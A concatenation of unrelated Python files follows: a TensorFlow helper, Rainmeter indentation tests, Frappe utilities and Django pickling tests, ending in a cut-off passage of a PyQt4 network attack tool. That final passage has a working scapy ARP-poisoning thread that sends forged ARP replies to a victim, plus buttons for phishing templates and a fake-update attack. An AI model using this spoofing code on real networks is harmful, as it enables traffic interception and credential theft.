inputs: a tensor of size [batch_size, height, width, channels].
op: an operation.
*args: args for the op.
**kwargs: kwargs for the op.
Returns:
    a tensor resulting from applying the operation op, repetitions times.
Raises:
ValueError: if the op is unknown or wrong.
"""
scope = kwargs.pop('scope', None)
with tf.variable_op_scope([inputs], scope, 'RepeatOp'):
tower = inputs
for _ in range(repetitions):
tower = op(tower, *args, **kwargs)
return tower
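# A minimal sketch mirroring the docstring example above (hypothetical `net`
# input tensor):
#
#   net = repeat_op(3, net, conv2d, 64, [3, 3], scope='conv1')
#   # variables are created under conv1/Conv, conv1/Conv_1 and conv1/Conv_2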
|
|
"""This module is for testing the indent rainmeter module."""
import sys
from unittest import TestCase
INDENT = sys.modules["Rainmeter.indentrainmeter"]
def indention_depth_from_initial(line):
"""Helper method to start with an initial indention type."""
return INDENT.calc_line_indention_depth(line, INDENT.IndentType.Initial, 0)
def indention_depth_from_fold(line):
"""Helper method to start with a fold marker indention type."""
return INDENT.calc_line_indention_depth(line, INDENT.IndentType.FoldMarker, 1)
def indention_depth_from_section(line):
"""Helper method to start with a section indention type."""
return INDENT.calc_line_indention_depth(line, INDENT.IndentType.Section, 1)
class TestCalcLineIndentionDepthFromInitial(TestCase):
"""
    This test shows the behaviour of detecting different indent types.
    The context depth can increase depending on how the document starts.
It accepts invalid Rainmeter definitions like:
Key=Value
    at the beginning of your document. This does not cause the indention itself to fail.
"""
def test_with_empty_line(self):
"""An empty line should be ignored."""
line = ""
indention_depth = indention_depth_from_initial(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Initial, 0))
def test_with_comment(self):
"""A comment will be ignored."""
line = "; This is a comment"
indention_depth = indention_depth_from_initial(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Initial, 0))
def test_with_fold_marker(self):
"""Fold markers increase the indention depth."""
line = ";; This is a fold marker"
indention_depth = indention_depth_from_initial(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.FoldMarker, 1))
def test_with_section(self):
"""Section increase the indention depth."""
line = "[Section]"
indention_depth = indention_depth_from_initial(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Section, 1))
def test_with_key_value(self):
"""Key values are actually invalid but they stay at the same indention level."""
line = "Key = Value"
indention_depth = indention_depth_from_initial(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Initial, 0))
class TestCalcLineIndentionDepthFromFoldMarker(TestCase):
"""
This test is to show the behaviour for an indention coming from a fold marker.
A fold marker is defined by ;;
    and is meant as syntactic sugar to fold multiple sections at once.
    For example you can group all meters together, or everything about problem X.
"""
def test_with_empty_line(self):
"""
Due to the fold marker the indention depth is 1.
Thus the following indention depth stays at 1
but the line itself is rendered as zero.
        This prevents a lot of whitespace in the file
if you split up your section.
"""
line = ""
indention_depth = indention_depth_from_fold(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.FoldMarker, 1))
def test_with_comment(self):
"""Comment are printed in the same indention level as given."""
line = "; This is a comment"
indention_depth = indention_depth_from_fold(line)
self.assertEqual(indention_depth, (1, INDENT.IndentType.FoldMarker, 1))
def test_with_fold_marker(self):
"""Additional fold marker will be printed at the same level as the previous fold marker."""
line = ";; This is a fold marker"
indention_depth = indention_depth_from_fold(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.FoldMarker, 1))
def test_with_section(self):
"""A section increases the depth context."""
line = "[Section]"
indention_depth = indention_depth_from_fold(line)
self.assertEqual(indention_depth, (1, INDENT.IndentType.Section, 2))
def test_with_key_value(self):
"""
        Specially handled case since it is invalid.
        Key-value pairs stay at level 1.
"""
line = "Key = Value"
indention_depth = indention_depth_from_fold(line)
self.assertEqual(indention_depth, (1, INDENT.IndentType.FoldMarker, 1))
class TestCalcLineIndentionDepthFromSection(TestCase):
"""Section increase the depth level."""
def test_with_empty_line(self):
"""Empty lines are ignored."""
line = ""
indention_depth = indention_depth_from_section(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Section, 1))
def test_with_comment(self):
"""Comment are printed on same level as key value pairs."""
line = "; This is a comment"
indention_depth = indention_depth_from_section(line)
self.assertEqual(indention_depth, (1, INDENT.IndentType.Section, 1))
def test_with_fold_marker(self):
"""Invalid construct, but this counts as a simple comment."""
line = ";; This is a fold marker"
indention_depth = indention_depth_from_section(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.FoldMarker, 1))
def test_with_section(self):
"""Invalid construct. Section following a section are staying on the same level."""
line = "[Section]"
indention_depth = indention_depth_from_section(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Section, 1))
def test_with_key_value(self):
"""KeyValue Pairs are printed on the next level."""
line = "Key = Value"
indention_depth = indention_depth_from_section(line)
self.assertEqual(indention_depth, (1, INDENT.IndentType.Section, 1))
class TestIndentWholeSection(TestCase):
"""This is about testing a whole function test."""
def test_one_section(self):
"""Testing a stand alone section."""
content = '''
[Rainmeter]
Update=1000
DynamicWindowSize=1
DefaultUpdateDivider=1000
AccurateText=1
OnWakeAction=[!Refresh "(Config)"]'''
result = '''
[Rainmeter]
\tUpdate=1000
\tDynamicWindowSize=1
\tDefaultUpdateDivider=1000
\tAccurateText=1
\tOnWakeAction=[!Refresh "(Config)"]'''
reference = INDENT.indent_text_by_tab_size(content)
self.assertEqual(reference, result)
def test_two_sections(self):
"""Testing only two consecutive sections."""
content = '''
[Rainmeter]
Update=1000
DynamicWindowSize=1
DefaultUpdateDivider=1000
AccurateText=1
OnWakeAction=[!Refresh "(Config)"]
[Metadata]
Name=TestEnvironment
Author=thatsIch
Information=PlayGround for Metadata
Version=0.0.1
License=MIT'''
result = '''
[Rainmeter]
\tUpdate=1000
\tDynamicWindowSize=1
\tDefaultUpdateDivider=1000
\tAccurateText=1
\tOnWakeAction=[!Refresh "(Config)"]
[Metadata]
\tName=TestEnvironment
\tAuthor=thatsIch
\tInformation=PlayGround for Metadata
\tVersion=0.0.1
\tLicense=MIT'''
reference = INDENT.indent_text_by_tab_size(content)
self.assertEqual(reference, result)
def test_section_with_divider(self):
"""After a divider a section can follow which needs to be fully indented."""
content = '''
;;====================================================
;; Rainmeter Section
;;====================================================
[Rainmeter]
Update=1000
DynamicWindowSize=1
DefaultUpdateDivider=1000
AccurateText=1
OnWakeAction=[!Refresh "(Config)"]'''
result = '''
;;====================================================
;; Rainmeter Section
;;====================================================
\t[Rainmeter]
\t\tUpdate=1000
\t\tDynamicWindowSize=1
\t\tDefaultUpdateDivider=1000
\t\tAccurateText=1
\t\tOnWakeAction=[!Refresh "(Config)"]'''
reference = INDENT.indent_text_by_tab_size(content)
self.assertEqual(reference, result)
def test_divider_with_two_sections(self):
"""
After a divider multiple sections can follow.
Both sections need to be fully indented.
"""
content = '''
;;====================================================
;; Rainmeter Section
;;====================================================
[Rainmeter]
Update=1000
DynamicWindowSize=1
DefaultUpdateDivider=1000
AccurateText=1
OnWakeAction=[!Refresh "(Config)"]
[Metadata]
Name=TestEnvironment
Author=thatsIch
Information=PlayGround for Metadata
Version=0.0.1
License=MIT'''
result = '''
;;====================================================
;; Rainmeter Section
;;====================================================
\t[Rainmeter]
\t\tUpdate=1000
\t\tDynamicWindowSize=1
\t\tDefaultUpdateDivider=1000
\t\tAccurateText=1
\t\tOnWakeAction=[!Refresh "(Config)"]
\t[Metadata]
\t\tName=TestEnvironment
\t\tAuthor=thatsIch
\t\tInformation=PlayGround for Metadata
\t\tVersion=0.0.1
\t\tLicense=MIT'''
reference = INDENT.indent_text_by_tab_size(content)
self.assertEqual(reference, result)
|
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# util __init__.py
from __future__ import unicode_literals
from werkzeug.test import Client
import os, sys, re, urllib
import frappe
import requests
# utility functions like cint, int, flt, etc.
from frappe.utils.data import *
default_fields = ['doctype', 'name', 'owner', 'creation', 'modified', 'modified_by',
'parent', 'parentfield', 'parenttype', 'idx', 'docstatus']
# used in import_docs.py
# TODO: deprecate it
def getCSVelement(v):
"""
	 Returns the CSV-escaped value of `v`. For example:
	 * apple stays apple (no special characters to escape)
* hi"there becomes "hi""there"
"""
v = cstr(v)
if not v: return ''
if (',' in v) or ('\n' in v) or ('"' in v):
if '"' in v: v = v.replace('"', '""')
return '"'+v+'"'
else: return v or ''
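# A brief sketch of the escaping behaviour (illustrative values):
#
#   getCSVelement('apple')     # -> 'apple' (no special characters)
#   getCSVelement('hi"there')  # -> '"hi""there"'
#   getCSVelement('a,b')       # -> '"a,b"'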
def get_fullname(user=None):
"""get the full name (first name + last name) of the user from User"""
if not user:
user = frappe.session.user
if not hasattr(frappe.local, "fullnames"):
frappe.local.fullnames = {}
if not frappe.local.fullnames.get(user):
p = frappe.db.get_value("User", user, ["first_name", "last_name"], as_dict=True)
if p:
frappe.local.fullnames[user] = " ".join(filter(None,
[p.get('first_name'), p.get('last_name')])) or user
else:
frappe.local.fullnames[user] = user
return frappe.local.fullnames.get(user)
def get_formatted_email(user):
"""get email id of user formatted as: John Doe <johndoe@example.com>"""
if user == "Administrator":
return user
from email.utils import formataddr
fullname = get_fullname(user)
return formataddr((fullname, user))
def extract_email_id(email):
"""fetch only the email part of the email id"""
from email.utils import parseaddr
fullname, email_id = parseaddr(email)
if isinstance(email_id, basestring) and not isinstance(email_id, unicode):
email_id = email_id.decode("utf-8", "ignore")
return email_id
def validate_email_add(email_str, throw=False):
"""Validates the email string"""
if email_str and " " in email_str and "<" not in email_str:
# example: "test@example.com test2@example.com" will return "test@example.comtest2" after parseaddr!!!
return False
email = extract_email_id(email_str)
match = re.match("[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?", email.lower())
if not match:
return False
matched = match.group(0)
if match:
match = matched==email.lower()
if not match and throw:
frappe.throw(frappe._("{0} is not a valid email id").format(email),
frappe.InvalidEmailAddressError)
return matched
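# A brief sketch of the expected results (illustrative addresses only):
#
#   validate_email_add("john.doe@example.com")  # -> "john.doe@example.com"
#   validate_email_add("not an email")          # -> False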
def split_emails(txt):
email_list = []
for email in re.split(''',(?=(?:[^"]|"[^"]*")*$)''', cstr(txt)):
email = strip(cstr(email))
if email:
email_list.append(email)
return email_list
def random_string(length):
"""generate a random string"""
import string
from random import choice
return ''.join([choice(string.letters + string.digits) for i in range(length)])
def get_gravatar(email):
import md5
return "https://secure.gravatar.com/avatar/{hash}?d=retro".format(hash=md5.md5(email).hexdigest())
def get_traceback():
"""
Returns the traceback of the Exception
"""
import traceback
exc_type, value, tb = sys.exc_info()
trace_list = traceback.format_tb(tb, None) + \
traceback.format_exception_only(exc_type, value)
body = "Traceback (innermost last):\n" + "%-20s %s" % \
(unicode((b"").join(trace_list[:-1]), 'utf-8'), unicode(trace_list[-1], 'utf-8'))
if frappe.logger:
frappe.logger.error('Db:'+(frappe.db and frappe.db.cur_db_name or '') \
+ ' - ' + body)
return body
def log(event, details):
frappe.logger.info(details)
def dict_to_str(args, sep='&'):
"""
	Converts a dictionary to a URL-encoded query string
"""
t = []
for k in args.keys():
t.append(str(k)+'='+urllib.quote(str(args[k] or '')))
return sep.join(t)
# Get Defaults
# ==============================================================================
def get_defaults(key=None):
"""
Get dictionary of default values from the defaults, or a value if key is passed
"""
return frappe.db.get_defaults(key)
def set_default(key, val):
"""
	Set / add a default value to the defaults
"""
return frappe.db.set_default(key, val)
def remove_blanks(d):
"""
Returns d with empty ('' or None) values stripped
"""
empty_keys = []
for key in d:
if d[key]=='' or d[key]==None:
# del d[key] raises runtime exception, using a workaround
empty_keys.append(key)
for key in empty_keys:
del d[key]
return d
def strip_html_tags(text):
"""Remove html tags from text"""
return re.sub("\<[^>]*\>", "", text)
def pprint_dict(d, level=1, no_blanks=True):
"""
Pretty print a dictionary with indents
"""
if no_blanks:
remove_blanks(d)
# make indent
indent, ret = '', ''
for i in range(0,level): indent += '\t'
# add lines
comment, lines = '', []
kl = d.keys()
kl.sort()
# make lines
for key in kl:
if key != '##comment':
tmp = {key: d[key]}
lines.append(indent + str(tmp)[1:-1] )
# add comment string
if '##comment' in kl:
ret = ('\n' + indent) + '# ' + d['##comment'] + '\n'
# open
ret += indent + '{\n'
# lines
ret += indent + ',\n\t'.join(lines)
# close
ret += '\n' + indent + '}'
return ret
def get_common(d1,d2):
"""
returns (list of keys) the common part of two dicts
"""
return [p for p in d1 if p in d2 and d1[p]==d2[p]]
def get_common_dict(d1, d2):
"""
return common dictionary of d1 and d2
"""
ret = {}
for key in d1:
if key in d2 and d2[key]==d1[key]:
ret[key] = d1[key]
return ret
def get_diff_dict(d1, d2):
"""
	return dictionary of keys (with values) present in d2 but not in d1
"""
diff_keys = set(d2.keys()).difference(set(d1.keys()))
ret = {}
for d in diff_keys: ret[d] = d2[d]
return ret
def get_file_timestamp(fn):
"""
Returns timestamp of the given file
"""
from frappe.utils import cint
try:
return str(cint(os.stat(fn).st_mtime))
except OSError, e:
if e.args[0]!=2:
raise
else:
return None
# to be deprecated
def make_esc(esc_chars):
"""
Function generator for Escaping special characters
"""
return lambda s: ''.join(['\\' + c if c in esc_chars else c for c in s])
# esc / unescape characters -- used for command line
def esc(s, esc_chars):
"""
Escape special characters
"""
if not s:
return ""
for c in esc_chars:
esc_str = '\\' + c
s = s.replace(c, esc_str)
return s
def unesc(s, esc_chars):
"""
UnEscape special characters
"""
for c in esc_chars:
esc_str = '\\' + c
s = s.replace(esc_str, c)
return s
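# A brief sketch of esc/unesc round-tripping (illustrative input):
#
#   esc('a"b', '"')     # -> 'a\"b' (a backslash is inserted before the quote)
#   unesc('a\"b', '"')  # -> 'a"b'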
def execute_in_shell(cmd, verbose=0):
# using Popen instead of os.system - as recommended by python docs
from subprocess import Popen
import tempfile
with tempfile.TemporaryFile() as stdout:
with tempfile.TemporaryFile() as stderr:
p = Popen(cmd, shell=True, stdout=stdout, stderr=stderr)
p.wait()
stdout.seek(0)
out = stdout.read()
stderr.seek(0)
err = stderr.read()
if verbose:
if err: print err
if out: print out
return err, out
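# A brief usage sketch (the command below is illustrative):
#
#   err, out = execute_in_shell("ls -l /tmp")
#   if err:
#       print err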
def get_path(*path, **kwargs):
base = kwargs.get('base')
if not base:
base = frappe.local.site_path
return os.path.join(base, *path)
def get_site_base_path(sites_dir=None, hostname=None):
return frappe.local.site_path
def get_site_path(*path):
return get_path(base=get_site_base_path(), *path)
def get_files_path(*path):
return get_site_path("public", "files", *path)
def get_backups_path():
return get_site_path("private", "backups")
def get_request_site_address(full_address=False):
return get_url(full_address=full_address)
def encode_dict(d, encoding="utf-8"):
for key in d:
if isinstance(d[key], basestring) and isinstance(d[key], unicode):
d[key] = d[key].encode(encoding)
return d
def decode_dict(d, encoding="utf-8"):
for key in d:
if isinstance(d[key], basestring) and not isinstance(d[key], unicode):
d[key] = d[key].decode(encoding, "ignore")
return d
def get_site_name(hostname):
return hostname.split(':')[0]
def get_disk_usage():
"""get disk usage of files folder"""
files_path = get_files_path()
if not os.path.exists(files_path):
return 0
err, out = execute_in_shell("du -hsm {files_path}".format(files_path=files_path))
return cint(out.split("\n")[-2].split("\t")[0])
def touch_file(path):
with open(path, 'a'):
os.utime(path, None)
return True
def get_test_client():
from frappe.app import application
return Client(application)
def get_hook_method(hook_name, fallback=None):
method = (frappe.get_hooks().get(hook_name))
if method:
method = frappe.get_attr(method[0])
return method
if fallback:
return fallback
def update_progress_bar(txt, i, l):
lt = len(txt)
if lt < 36:
txt = txt + " "*(36-lt)
complete = int(float(i+1) / l * 40)
sys.stdout.write("\r{0}: [{1}{2}]".format(txt, "="*complete, " "*(40-complete)))
sys.stdout.flush()
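# A brief usage sketch (the label and `total` below are illustrative):
#
#   for i in range(total):
#       update_progress_bar("Importing records", i, total)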
def get_html_format(print_path):
html_format = None
if os.path.exists(print_path):
with open(print_path, "r") as f:
html_format = f.read()
for include_directive, path in re.findall("""({% include ['"]([^'"]*)['"] %})""", html_format):
for app_name in frappe.get_installed_apps():
include_path = frappe.get_app_path(app_name, *path.split(os.path.sep))
if os.path.exists(include_path):
with open(include_path, "r") as f:
html_format = html_format.replace(include_directive, f.read())
break
return html_format
def is_markdown(text):
if "<!-- markdown -->" in text:
return True
elif "<!-- html -->" in text:
return False
else:
return not re.search("<p[\s]*>|<br[\s]*>", text)
def get_sites(sites_path=None):
import os
if not sites_path:
sites_path = '.'
return [site for site in os.listdir(sites_path)
if os.path.isdir(os.path.join(sites_path, site))
and not site in ('assets',)]
def get_request_session(max_retries=3):
from requests.packages.urllib3.util import Retry
session = requests.Session()
session.mount("http://", requests.adapters.HTTPAdapter(max_retries=Retry(total=5, status_forcelist=[500])))
session.mount("https://", requests.adapters.HTTPAdapter(max_retries=Retry(total=5, status_forcelist=[500])))
return session
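# A brief usage sketch (the URL is illustrative); the returned session retries
# requests that fail with HTTP 500 before giving up:
#
#   session = get_request_session()
#   response = session.get("https://example.com/api")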
|
|
import datetime
import pickle
from django.db import models
from django.test import TestCase
from django.utils.version import get_version
from .models import Container, Event, Group, Happening, M2MModel
class PickleabilityTestCase(TestCase):
def setUp(self):
Happening.objects.create() # make sure the defaults are working (#20158)
def assert_pickles(self, qs):
self.assertEqual(list(pickle.loads(pickle.dumps(qs))), list(qs))
def test_related_field(self):
g = Group.objects.create(name="Ponies Who Own Maybachs")
self.assert_pickles(Event.objects.filter(group=g.id))
def test_datetime_callable_default_all(self):
self.assert_pickles(Happening.objects.all())
def test_datetime_callable_default_filter(self):
self.assert_pickles(Happening.objects.filter(when=datetime.datetime.now()))
def test_string_as_default(self):
self.assert_pickles(Happening.objects.filter(name="test"))
def test_standalone_method_as_default(self):
self.assert_pickles(Happening.objects.filter(number1=1))
def test_staticmethod_as_default(self):
self.assert_pickles(Happening.objects.filter(number2=1))
def test_filter_reverse_fk(self):
self.assert_pickles(Group.objects.filter(event=1))
def test_doesnotexist_exception(self):
# Ticket #17776
original = Event.DoesNotExist("Doesn't exist")
unpickled = pickle.loads(pickle.dumps(original))
# Exceptions are not equal to equivalent instances of themselves, so
# can't just use assertEqual(original, unpickled)
self.assertEqual(original.__class__, unpickled.__class__)
self.assertEqual(original.args, unpickled.args)
def test_manager_pickle(self):
pickle.loads(pickle.dumps(Happening.objects))
def test_model_pickle(self):
"""
A model not defined on module level is picklable.
"""
original = Container.SomeModel(pk=1)
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
# Also, deferred dynamic model works
Container.SomeModel.objects.create(somefield=1)
original = Container.SomeModel.objects.defer('somefield')[0]
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
self.assertEqual(original.somefield, reloaded.somefield)
def test_model_pickle_m2m(self):
"""
        Intentionally test the automatically created through model.
"""
m1 = M2MModel.objects.create()
g1 = Group.objects.create(name='foof')
m1.groups.add(g1)
m2m_through = M2MModel._meta.get_field('groups').remote_field.through
original = m2m_through.objects.get()
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
def test_model_pickle_dynamic(self):
class Meta:
proxy = True
dynclass = type("DynamicEventSubclass", (Event, ), {'Meta': Meta, '__module__': Event.__module__})
original = dynclass(pk=1)
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
self.assertIs(reloaded.__class__, dynclass)
def test_specialized_queryset(self):
self.assert_pickles(Happening.objects.values('name'))
self.assert_pickles(Happening.objects.values('name').dates('when', 'year'))
# With related field (#14515)
self.assert_pickles(
Event.objects.select_related('group').order_by('title').values_list('title', 'group__name')
)
def test_pickle_prefetch_related_idempotence(self):
g = Group.objects.create(name='foo')
groups = Group.objects.prefetch_related('event_set')
# First pickling
groups = pickle.loads(pickle.dumps(groups))
self.assertSequenceEqual(groups, [g])
# Second pickling
groups = pickle.loads(pickle.dumps(groups))
self.assertSequenceEqual(groups, [g])
def test_pickle_prefetch_queryset_usable_outside_of_prefetch(self):
# Prefetch shouldn't affect the fetch-on-pickle behavior of the
# queryset passed to it.
Group.objects.create(name='foo')
events = Event.objects.order_by('id')
Group.objects.prefetch_related(models.Prefetch('event_set', queryset=events))
with self.assertNumQueries(1):
events2 = pickle.loads(pickle.dumps(events))
with self.assertNumQueries(0):
list(events2)
def test_pickle_prefetch_queryset_still_usable(self):
g = Group.objects.create(name='foo')
groups = Group.objects.prefetch_related(
models.Prefetch('event_set', queryset=Event.objects.order_by('id'))
)
groups2 = pickle.loads(pickle.dumps(groups))
self.assertSequenceEqual(groups2.filter(id__gte=0), [g])
def test_pickle_prefetch_queryset_not_evaluated(self):
Group.objects.create(name='foo')
groups = Group.objects.prefetch_related(
models.Prefetch('event_set', queryset=Event.objects.order_by('id'))
)
list(groups) # evaluate QuerySet
with self.assertNumQueries(0):
pickle.loads(pickle.dumps(groups))
def test_pickle_prefetch_related_with_m2m_and_objects_deletion(self):
"""
#24831 -- Cached properties on ManyToOneRel created in QuerySet.delete()
caused subsequent QuerySet pickling to fail.
"""
g = Group.objects.create(name='foo')
m2m = M2MModel.objects.create()
m2m.groups.add(g)
Group.objects.all().delete()
m2ms = M2MModel.objects.prefetch_related('groups')
m2ms = pickle.loads(pickle.dumps(m2ms))
self.assertSequenceEqual(m2ms, [m2m])
def test_annotation_with_callable_default(self):
# Happening.when has a callable default of datetime.datetime.now.
qs = Happening.objects.annotate(latest_time=models.Max('when'))
self.assert_pickles(qs)
def test_missing_django_version_unpickling(self):
"""
#21430 -- Verifies a warning is raised for querysets that are
unpickled without a Django version
"""
qs = Group.missing_django_version_objects.all()
msg = "Pickled queryset instance's Django version is not specified."
with self.assertRaisesMessage(RuntimeWarning, msg):
pickle.loads(pickle.dumps(qs))
def test_unsupported_unpickle(self):
"""
#21430 -- Verifies a warning is raised for querysets that are
unpickled with a different Django version than the current
"""
qs = Group.previous_django_version_objects.all()
msg = "Pickled queryset instance's Django version 1.0 does not match the current version %s." % get_version()
with self.assertRaisesMessage(RuntimeWarning, msg):
pickle.loads(pickle.dumps(qs))
class InLookupTests(TestCase):
@classmethod
def setUpTestData(cls):
for i in range(1, 3):
group = Group.objects.create(name='Group {}'.format(i))
cls.e1 = Event.objects.create(title='Event 1', group=group)
def test_in_lookup_queryset_evaluation(self):
"""
Neither pickling nor unpickling a QuerySet.query with an __in=inner_qs
lookup should evaluate inner_qs.
"""
events = Event.objects.filter(group__in=Group.objects.all())
with self.assertNumQueries(0):
dumped = pickle.dumps(events.query)
with self.assertNumQueries(0):
reloaded = pickle.loads(dumped)
reloaded_events = Event.objects.none()
reloaded_events.query = reloaded
self.assertSequenceEqual(reloaded_events, [self.e1])
def test_in_lookup_query_evaluation(self):
events = Event.objects.filter(group__in=Group.objects.values('id').query)
with self.assertNumQueries(0):
dumped = pickle.dumps(events.query)
with self.assertNumQueries(0):
reloaded = pickle.loads(dumped)
reloaded_events = Event.objects.none()
reloaded_events.query = reloaded
self.assertSequenceEqual(reloaded_events, [self.e1])
|
|
#The MIT License (MIT)
#Copyright (c) 2015-2016 mh4x0f P0cL4bs Team
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from Core.Settings import frm_Settings
from Modules.ModuleUpdateFake import frm_update_attack
from Modules.ModuleTemplates import frm_template
from Modules.utils import ProcessThread,Refactor,ThreadScan
from os import popen,chdir,getcwd,getuid,devnull,system
from scapy.all import *
import threading
import subprocess
from urllib2 import urlopen,URLError
from re import search,compile
from multiprocessing import Process,Manager
from time import sleep
threadloading = {'template':[],'posion':[]}
class frm_Arp(QMainWindow):
def __init__(self, parent=None):
super(frm_Arp, self).__init__(parent)
self.form_widget = frm_Arp_Poison(self)
self.setCentralWidget(self.form_widget)
class ThreadAttackPosion(QThread):
def __init__(self,victim,gateway,mac):
QThread.__init__(self)
self.victim = victim
self.gateway = gateway
self.mac = mac
self.process = True
def run(self):
print 'Starting Thread:' + self.objectName()
while self.process:
arp = ARP(op=1,psrc=self.gateway,pdst=self.victim,hwdst=self.mac)
send(arp,verbose=False)
sleep(2)
def stop(self):
self.process = False
print 'Stop thread:' + self.objectName()
self.emit(SIGNAL('Activated( QString )'),'Ok')
class frm_Arp_Poison(QWidget):
def __init__(self, parent=None):
super(frm_Arp_Poison, self).__init__(parent)
        self.setWindowTitle('Arp Poison Attack')
self.setWindowIcon(QIcon('rsc/icon.ico'))
self.Main = QVBoxLayout()
self.owd = getcwd()
self.control = False
self.interfaces = Refactor.get_interfaces()
self.configure = frm_Settings()
self.loadtheme(self.configure.XmlThemeSelected())
self.module_network = Refactor
self.data = {'IPaddress':[], 'Hostname':[], 'MacAddress':[]}
self.ThreadDirc = {'Arp_posion':[]}
global threadloading
self.GUI()
def closeEvent(self, event):
if (len(self.ThreadDirc['Arp_posion']) != 0) or len(threadloading['template']) !=0:
            reply = QMessageBox.question(self, 'About Exit','Are you sure you want to close Arp Poison?', QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
if getuid() == 0:
try:
for i in self.ThreadDirc['Arp_posion']:
i.stop(),i.join()
for i in threadloading['template']:
i.stop(),i.join()
threadloading['template'] = []
except:pass
self.deleteLater()
else:
pass
else:
event.ignore()
def loadtheme(self,theme):
sshFile=("Core/%s.qss"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def GUI(self):
self.form =QFormLayout()
self.movie = QMovie('rsc/loading2.gif', QByteArray(), self)
size = self.movie.scaledSize()
self.setGeometry(200, 200, size.width(), size.height())
self.movie_screen = QLabel()
self.movie_screen.setFixedHeight(200)
self.movie_screen.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.movie_screen.setAlignment(Qt.AlignCenter)
self.movie.setCacheMode(QMovie.CacheAll)
self.movie.setSpeed(100)
self.movie_screen.setMovie(self.movie)
self.movie_screen.setDisabled(False)
self.movie.start()
self.tables = QTableWidget(5,3)
self.tables.setRowCount(100)
self.tables.setFixedHeight(200)
self.tables.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tables.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.tables.clicked.connect(self.list_clicked_scan)
self.tables.resizeColumnsToContents()
self.tables.resizeRowsToContents()
self.tables.horizontalHeader().resizeSection(1,120)
self.tables.horizontalHeader().resizeSection(0,145)
self.tables.horizontalHeader().resizeSection(2,158)
self.tables.verticalHeader().setVisible(False)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.txt_target = QLineEdit(self)
self.txt_gateway = QLineEdit(self)
self.txt_redirect = QLineEdit(self)
self.txt_mac = QLineEdit(self)
self.ip_range = QLineEdit(self)
self.txt_status_scan = QLabel('')
self.txt_statusarp = QLabel('')
self.txt_status_phishing = QLabel('')
self.StatusMonitor(False,'stas_scan')
self.StatusMonitor(False,'stas_arp')
self.StatusMonitor(False,'stas_phishing')
scan_range = self.configure.xmlSettings('scan','rangeIP',None,False)
self.ip_range.setText(scan_range)
self.btn_start_scanner = QPushButton('Scan')
self.btn_stop_scanner = QPushButton('Stop')
self.btn_Attack_Posion = QPushButton('Start Attack')
self.btn_Stop_Posion = QPushButton('Stop Attack')
self.btn_server = QPushButton('Templates')
self.btn_windows_update = QPushButton('Fake Update')
self.btn_server.setFixedHeight(22)
self.btn_stop_scanner.setFixedWidth(100)
self.btn_start_scanner.setFixedWidth(100)
self.btn_start_scanner.setFixedHeight(22)
self.btn_stop_scanner.setFixedHeight(22)
self.btn_windows_update.setFixedHeight(22)
self.btn_start_scanner.clicked.connect(self.Start_scan)
self.btn_stop_scanner.clicked.connect(self.Stop_scan)
self.btn_Attack_Posion.clicked.connect(self.Start_Attack)
self.btn_Stop_Posion.clicked.connect(self.kill_attack)
self.btn_server.clicked.connect(self.show_template_dialog)
self.btn_windows_update.clicked.connect(self.show_frm_fake)
#icons
self.btn_start_scanner.setIcon(QIcon('rsc/network.png'))
self.btn_Attack_Posion.setIcon(QIcon('rsc/start.png'))
self.btn_Stop_Posion.setIcon(QIcon('rsc/Stop.png'))
self.btn_stop_scanner.setIcon(QIcon('rsc/network_off.png'))
self.btn_server.setIcon(QIcon('rsc/page.png'))
self.btn_windows_update.setIcon(QIcon('rsc/winUp.png'))
self.grid0 = QGridLayout()
self.grid0.minimumSize()
        self.grid0.addWidget(QLabel('ArpPoison:'),0,2)
self.grid0.addWidget(QLabel('Phishing:'),0,4)
self.grid0.addWidget(QLabel('Scanner:'),0,0)
self.grid0.addWidget(self.txt_status_scan,0,1)
self.grid0.addWidget(self.txt_statusarp,0,3)
self.grid0.addWidget(self.txt_status_phishing,0,5)
# grid options
self.grid1 = QGridLayout()
self.grid1.addWidget(self.btn_start_scanner,0,0)
self.grid1.addWidget(self.btn_stop_scanner,0,1)
